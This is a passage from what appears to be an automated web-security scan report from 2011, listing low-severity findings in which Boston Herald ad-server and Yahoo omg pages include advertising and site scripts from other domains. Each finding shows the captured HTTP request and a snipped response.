Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.15.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:03:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ROS | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.102. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.103. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.38.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.104. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.38.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 607
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_160x600_ATF | http://www.bostonherald.com/ | 160 x 600 Wide Skyscraper -->\n');
document.write ('<script type="text/javascript">\n');

...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.105. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.106. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.107. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ATF | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.108. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 607
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_160x600_ATF | http://www.bostonherald.com/ | 160 x 600 Wide Skyscraper -->\n');
document.write ('<script type="text/javascript">\n');

...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.15.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.12.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 607
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_160x600_ATF | http://www.bostonherald.com/ | 160 x 600 Wide Skyscraper -->\n');
document.write ('<script type="text/javascript">\n');

...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.12.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.113. http://omg.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 72757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

   
   <title>omg! Celebrity gossip, news, photos, babies, couples, hotties, and more - omg! on Ya
...[SNIP]...
</script><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
<!--QYZ ,;;;2115806991;;-->                
               
<script language="javascript" src="http://l.yimg.com/a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js"></script>
...[SNIP]...

18.114. http://omg.yahoo.com/photos/what-were-they-thinking/5203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /photos/what-were-they-thinking/5203

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /photos/what-were-they-thinking/5203 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:58 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=8942vl5777rt6&b=3&s=hu; expires=Tue, 16-Sep-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 135006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head profile="http://purl.org/NET/erdf/profile">

   <link rel="schema.celeb" href="http://omg.yahoo.co
...[SNIP]...
